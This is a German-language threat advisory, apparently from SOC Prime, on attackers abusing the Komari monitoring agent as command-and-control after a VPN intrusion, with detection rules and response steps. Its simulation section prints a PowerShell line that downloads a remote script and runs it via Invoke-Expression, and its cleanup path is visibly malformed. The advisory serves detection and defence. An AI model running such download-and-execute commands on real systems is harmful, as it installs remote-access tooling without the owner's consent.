SOC Prime Bias: Kritisch

30 Apr 2026 14:19 UTC

Komari: Das “Überwachungs” Tool, Das Keine Waffenentwicklung Brauchte

Author Photo
SOC Prime Team linkedin icon Folgen
Komari: Das “Überwachungs” Tool, Das Keine Waffenentwicklung Brauchte
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Ein Bedrohungsakteur nutzte gestohlene VPN-Zugangsdaten, um auf die Windows-Arbeitsstation eines Huntress-Partners zuzugreifen, aktivierte dann RDP und setzte den Open-Source-Monitoring-Agenten Komari als Dienst auf Systemebene ein, der als Windows Update Service durch NSSM getarnt war. Nach der Installation stellte der Agent eine persistente WebSocket-Verbindung zur von Angreifern kontrollierten Infrastruktur her und bot Funktionen wie Befehlsausführung, Terminalzugriff und Ping-Aktivitäten im Heartbeat-Stil. In der Praxis fungierte das Tool als leichtgewichtiges Command-and-Control-Framework ohne zusätzliche Bewaffnung.

Untersuchung

Der Einbruch begann mit einem SSL-VPN-Login, das von 45.153.34.132ausging, gefolgt von der Nutzung von Impacket’s smbexec.py , um RDP zu aktivieren und eine Reihe von Remote-Befehlen auszuführen. Die Ermittler fanden heraus, dass ein PowerShell-Einzeiler den Komari-Installer direkt von GitHub herunterlud und als Windows-Dienst registrierte. Dieser Dienst startete dann komari-agent.exe, öffnete eine WebSocket-Sitzung zum Server des Angreifers und ermöglichte beliebige Remote-Befehlsausführung auf dem Host.

Minderung

Huntress reagierte, indem die kompromittierte Arbeitsstation isoliert, das betroffene Benutzerkonto deaktiviert und der durch NSSM erstellte Komari-Dienst gestoppt wurde. Die bösartige WebSocket-Verbindung wurde blockiert und der Persistenzmechanismus aus dem System entfernt. Empfohlene Folgeverteidigungsmaßnahmen umfassen die Verschärfung der VPN-Zugriffskontrollen, die Überwachung verdächtiger Dienst-Erstellungsereignisse, die Inspektion ausgehender WebSocket-Aktivitäten und die Verstärkung der RDP-Sicherheit.

Reaktion

Verteidiger sollten die Erstellung eines Windows-Dienstes namens Windows Update Service erkennen, der auf komari-agent.exezeigt, lange ausgehende WebSocket-Verbindungen zu unbekannten Hosts überwachen und auf die Verwendung von Impacket-Tools wie smbexec.py für laterale Bewegungen alarmieren. Wenn identifiziert, sollte der betroffene Endpunkt sofort eingedämmt, kompromittierte Anmeldedaten widerrufen und der Schurken-Dienst aus der Umgebung entfernt werden.

Angriffsfluss

Erkennungen

Mögliche Impacket-Befehlszeilenmuster (über cmdline)

SOC Prime Team
30 Apr 2026

Mögliche Remote-Code-Ausführung mit Impacket (über cmdline)

SOC Prime Team
30 Apr 2026

Powershell führt Datei in verdächtigem Verzeichnis unter Verwendung von Bypass-Execution-Policy aus (über cmdline)

SOC Prime Team
30 Apr 2026

Herunterladen oder Hochladen über Powershell (über cmdline)

SOC Prime Team
30 Apr 2026

Mögliches Remote-Desktop-Services-Shadowing (über process_creation)

SOC Prime Team
30 Apr 2026

Verdächtige Firewall-Modifikationen über CLI (über cmdline)

SOC Prime Team
30 Apr 2026

Verdächtiger Prozess nutzt eine URL in der Befehlszeile (über cmdline)

SOC Prime Team
30 Apr 2026

Alternative Remote-Zugriffs-/Verwaltungssoftware (über process_creation)

SOC Prime Team
30 Apr 2026

IOCs (HashSha256) zur Erkennung: Komari: Das „Überwachungs“-Tool, das keine Bewaffnung benötigte

SOC Prime AI Rules
30 Apr 2026

IOCs (SourceIP) zur Erkennung: Komari: Das „Überwachungs“-Tool, das keine Bewaffnung benötigte

SOC Prime AI Rules
30 Apr 2026

IOCs (DestinationIP) zur Erkennung: Komari: Das „Überwachungs“-Tool, das keine Bewaffnung benötigte

SOC Prime AI Rules
30 Apr 2026

Erkennung von Impacket smbexec.py und cmd.exe-Ausführung über RDP [Windows-Prozessaktivierung]

SOC Prime AI Rules
30 Apr 2026

PowerShell-Ausführung für die Installation des Komari-Agents [Windows PowerShell]

SOC Prime AI Rules
30 Apr 2026

Erkennung der Komari-Agent-Persistenz über den Windows Update-Dienst [Windows-System]

SOC Prime AI Rules
30 Apr 2026

Erkennung von unberechtigtem SSLVPN-Zugriff und Aktivitäten nach dem Eindringen [Firewall]

SOC Prime AI Rules
30 Apr 2026

Simulationsausführung

Voraussetzung: Der Telemetrie- und Basislinien-Vorflug-Check muss bestanden werden.

  • Angriffserzählung & Befehle:
    Ein Gegner hat Zugriff auf einen Windows-Host erlangt und möchte den Komari C2-Agent installieren, um die Persistenz zu bewahren und später Anmeldedaten zu dumpen (T1003.001). Um traditionelle Skript-Blocking-Verteidigungen zu umgehen, führt der Angreifer PowerShell mit -ExecutionPolicy Bypass aus und lädt den Installer direkt aus dem öffentlichen GitHub-Repository herunter. Die Befehlszeile entspricht genau der Erkennungsregel und generiert die erwartete Telemetrie.

  • Regressionstest-Skript:

    # Komari-Agenten-Installation Simulation
    $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1"
    $script = (New-Object System.Net.WebClient).DownloadString($url)
    Invoke-Expression $script
  • Aufräumbefehle:

    # Entfernen von Dateien, die durch den simulierten Installer erstellt wurden (falls vorhanden)
    Remove-Item -Path "$Env:ProgramFilesKomari" -Recurse -Force -ErrorAction SilentlyContinue
    # Stoppen von Komari-Prozessen, die möglicherweise gestartet wurden
    Get-Process -Name "Komari" -ErrorAction SilentlyContinue | Stop-Process -Force